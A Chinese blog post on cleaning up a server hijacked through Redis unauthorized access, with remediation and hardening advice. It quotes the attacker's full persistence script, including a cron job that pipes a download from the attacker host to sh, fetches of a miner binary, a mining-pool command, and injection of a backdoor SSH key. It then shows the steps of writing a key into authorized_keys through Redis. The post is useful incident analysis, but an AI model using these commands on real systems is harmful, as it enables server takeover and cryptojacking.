小心Redis漏洞让你服务器沦为肉鸡

小心Redis漏洞让你服务器沦为肉鸡

2016-06-23龙果

 

前言

朋友的一个项目接到云服务器的告警，提示服务器已沦为肉鸡，网络带宽被大量占用，网站访问很慢，通过SSH终端远程管理服务器也频繁断开链接。朋友不知如何下手，便邀请我帮忙处理，处理过程中发现国内有大量的项目因此漏洞中招。在这里我把利用漏洞的攻击的详细过程列出来，并给出相应的处理方案和系统加固方案，目的是提醒大家注意系统安全，加强系统运维的安全配置。（特别提醒：本文仅供学习研究和系统安全防御,请不要利用文中所列漏洞去做违法的事情）

阿里云的安全告警邮件内容：

注：对外网开放访问权限并安装了Redis的服务器特别容易因此漏洞中招（比如你在云服务器上安全了Redis，云服务器公网可访问，并且很多云服务器的操作系统默认把防火墙服务关闭了，这种情况特意中招）

一、处理过程：

 1、在没有查到异常进程之前我是先把操作系统的带宽&端口用iptables 做了限制这样能保证我能远程操作服务器才能查找原因：

 

2、 在各种netstat –ntlp  的查看下没有任何异常 在top 下查到了有异常进程还有些异常的这里就截图一个：

3、果断把进程给kill -9  了  没想到再去ps的时候又来了意思就是会自动启动它。这就让我想到了crond 这个自动任务，果不其然 /var/spool/cron/root 这个文件被人做了手脚而且是二进制的。果断又给删除了，以为这下没事了结果过了两分钟这个文件又出来了。这个就引起我联想到了是不是有其它的守护进程，因为这样的情况肯定是有守护进程在才会发生。

于是百度了一下异常进程中的一段信息 yam -c x -M stratum+tcp ，果不其然确实是这个进程的问题。资料显示攻击是由于Redis未授权登陆漏洞被黑客利用，登录redis 控制台一看果然有个莫名其妙的key， 刚好这个key 就是ssh的key，于是断定黑客是从reids的未授权漏洞登陆进来的。

4、在服务器上我查了自动任务的文件被黑客编译成二进制的源文件代码，所以我无法得知内容。 但是我在crond的日志里面找到了它下载脚本的链接：

https://r.chanstring.com/api/report?pm=1 （IP地址【104.131.120.66】在美国）

5、详细攻击代码如下：

    exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

 

    echo "*/2 ** * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" >/var/spool/cron/root

    # echo "*/2* * * * ps auxf | grep -v grep | grep yam || /opt/yam/yam -c x -    Mstratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8    Coo:x@xmr.crypto-pool.fr:6666/xmr">> /var/spool/cron/root

    echo "*/5 ** * * ps auxf | grep -v grep | grep gg3lady || nohup /opt/gg3lady &">> /var/spool/cron/root

 

    ps auxf | grep-v grep | grep yam || nohup /opt/yam/yam -c x -    Mstratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8    Coo:x@xmr.crypto-pool.fr:6666/xmr&

 

    if [ ! -f"/root/.ssh/KHK75NEOiq" ]; then

         mkdir -p ~/.ssh

         rm -f ~/.ssh/authorized_keys*

         echo "ssh-    rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkB    CbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3tx    L6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX    1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot" > ~/.ssh/KHK75NEOiq

         echo "PermitRootLogin yes">> /etc/ssh/sshd_config

         echo "RSAAuthentication yes">> /etc/ssh/sshd_config

         echo "PubkeyAuthenticationyes" >> /etc/ssh/sshd_config

         echo "AuthorizedKeysFile.ssh/KHK75NEOiq" >> /etc/ssh/sshd_config

         /etc/init.d/sshd restart

    fi

 

    if [ ! -f"/opt/yam/yam" ]; then

         mkdir -p /opt/yam

         curl -f -Lhttps://r.chanstring.com/api/download/yam -o /opt/yam/yam

         chmod +x /opt/yam/yam

         # /opt/yam/yam -c x -    Mstratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8    Coo:x@xmr.crypto-pool.fr:6666/xmr

    fi

 

    if [ ! -f"/opt/gg3lady" ]; then

         curl -f -Lhttps://r.chanstring.com/api/download/gg3lady_`uname -i` -o /opt/gg3lady

         chmod +x /opt/gg3lady

    fi

 

    # yam=$(ps auxf| grep yam | grep -v grep | wc -l)

    # gg3lady=$(psauxf | grep gg3lady | grep -v grep | wc -l)

    # cpu=$(cat/proc/cpuinfo | grep processor | wc -l)

 

    # curlhttps://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg3lady=$gg3lady\&arch=`uname-i`

6、脚本分析

找到源头了，下面我们来分析下这个脚本：

    echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool    /cron/root   每两分钟执行一次这个脚本

     

  echo "*/5 ** * * ps auxf | grep -v grep | grep gg3lady || nohup /opt/gg3lady &">> /var/spool/cron/root

这个脚本我不知道干么的，应该是生成这个自动任务文件的守护进程，以至于删除自动任务文件会自动再来一份脚本进程死了这个自动任务又会起来

ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &

这个是挖矿脚本，黑客靠这个连接池去挖btc（比特币），意思就是这个肉鸡已经提供了。

下面这个就是一个免密钥登陆的脚本了

下面这两个是下载文件的脚本跟赋权限

 整个脚本的大致就这样  

7、处理方法

    要把 /var/spool/cron/root 删除，  /opt/yam/yam ，  删除   /opt/gg3lady ，删除 /root/.ssh/KHK75NEOiq 删除。

  把gg3lady  yam  进程结束还有就是sshd_confg 文件还原，把redis入侵的的Redis中的key删除应该就没问题了。但是为了安全起见，建议还是重装服务器操作系统比较保险，因为不能确保黑客没有留其他的漏洞后门，毕竟root权限已经被其获取过了。

8、对应的安全处理：
(1) 限制Redis的访问IP，如指定本地IP获指定特定IP可以访问。
(2) 如果是本地访问和使用，打开防火墙（阿里云等操作系统，默认把防火墙关了，这也是为什么朋友的这台服务器会中招的原因之一），不开放Redis端口，最好修改掉Redis的默认端口；
(3) 如果要远程访问，给Redis配置上授权访问密码；

二、Redis 未授权登录漏洞分析

  漏洞概要

Redis 默认情况下，会绑定在 0.0.0.0:6379，这样将会将Redis服务暴露到公网上，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。

攻击者在未授权访问Redis的情况下可以利用Redis的相关方法，可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中，进而可以直接登录目标服务器。

  漏洞描述

Redis 安全模型的观念是: “请不要将Redis暴露在公开网络中, 因为让不受信任的客户接触到Redis是非常危险的” 。

Redis 作者之所以放弃解决未授权访问导致的不安全性是因为, 99.99%使用Redis的场景都是在沙盒化的环境中, 为了0.01%的可能性增加安全规则的同时也增加了复杂性, 虽然这个问题的并不是不能解决的, 但是这在他的设计哲学中仍是不划算的。

因为其他受信任用户需要使用Redis或者因为运维人员的疏忽等原因，部分Redis 绑定在0.0.0.0:6379，并且没有开启认证（这是Redis的默认配置），如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip访问等，将会导致Redis服务直接暴露在公网上，导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。

利用Redis自身的相关方法，可以进行写文件操作，攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys文件中，进而可以直接登录目标服务器。  （导致可以执行任何操作）

  漏洞影响

Redis 暴露在公网（即绑定在0.0.0.0:6379，目标IP公网可访问），并且没有开启相关认证和添加相关安全策略情况下可受影响而导致被利用。

这里我可以演示一遍给大家看看怎么通过redis未授权漏洞直接免密钥进行登陆

 攻击过程

（注意我本机是162   要入侵的服务器是161）

1、 生成本地服务器私钥跟公钥

2、把公钥写进我们要攻击的服务器的redis一个key里面去 (为什么要把公钥加空格追加到一个文件是因为redis的存储)

3、 登陆要攻击的服务器redis控制台，从新定义redis保存数据的路径为configset dir /root/.ssh/（这个是需要知道linux下面ssh 面密钥登陆的key默认的存放才能设定的默认情况下是/roo/.ssh一般情况下很多管理员都不会去更改），在把reids的dbfilename定于成 linux 下面ssh面密钥登陆的文件名就好了configset dbfilename "authorized_keys"（默认文件名是authorized_keys 这个广大linux管理员都这个这个所以这个入侵还是要点linux功底的），最后保存 save 

4、激动人心的时刻到了直接ssh 登陆192.168.8.161  无需要密码就能登陆了

到这里我们就可以完全控制别人的服务器了，你想怎么玩就怎么玩了（特别提醒：以上入侵模拟流程仅供学习研究）

5、这里我搜了下全球有10W+的服务器将Redis默认端口暴露于公网之中（仅供学习研究,希望不要利用教程去做违法的事情）

技术支持：龙果学院 http://www.roncoo.com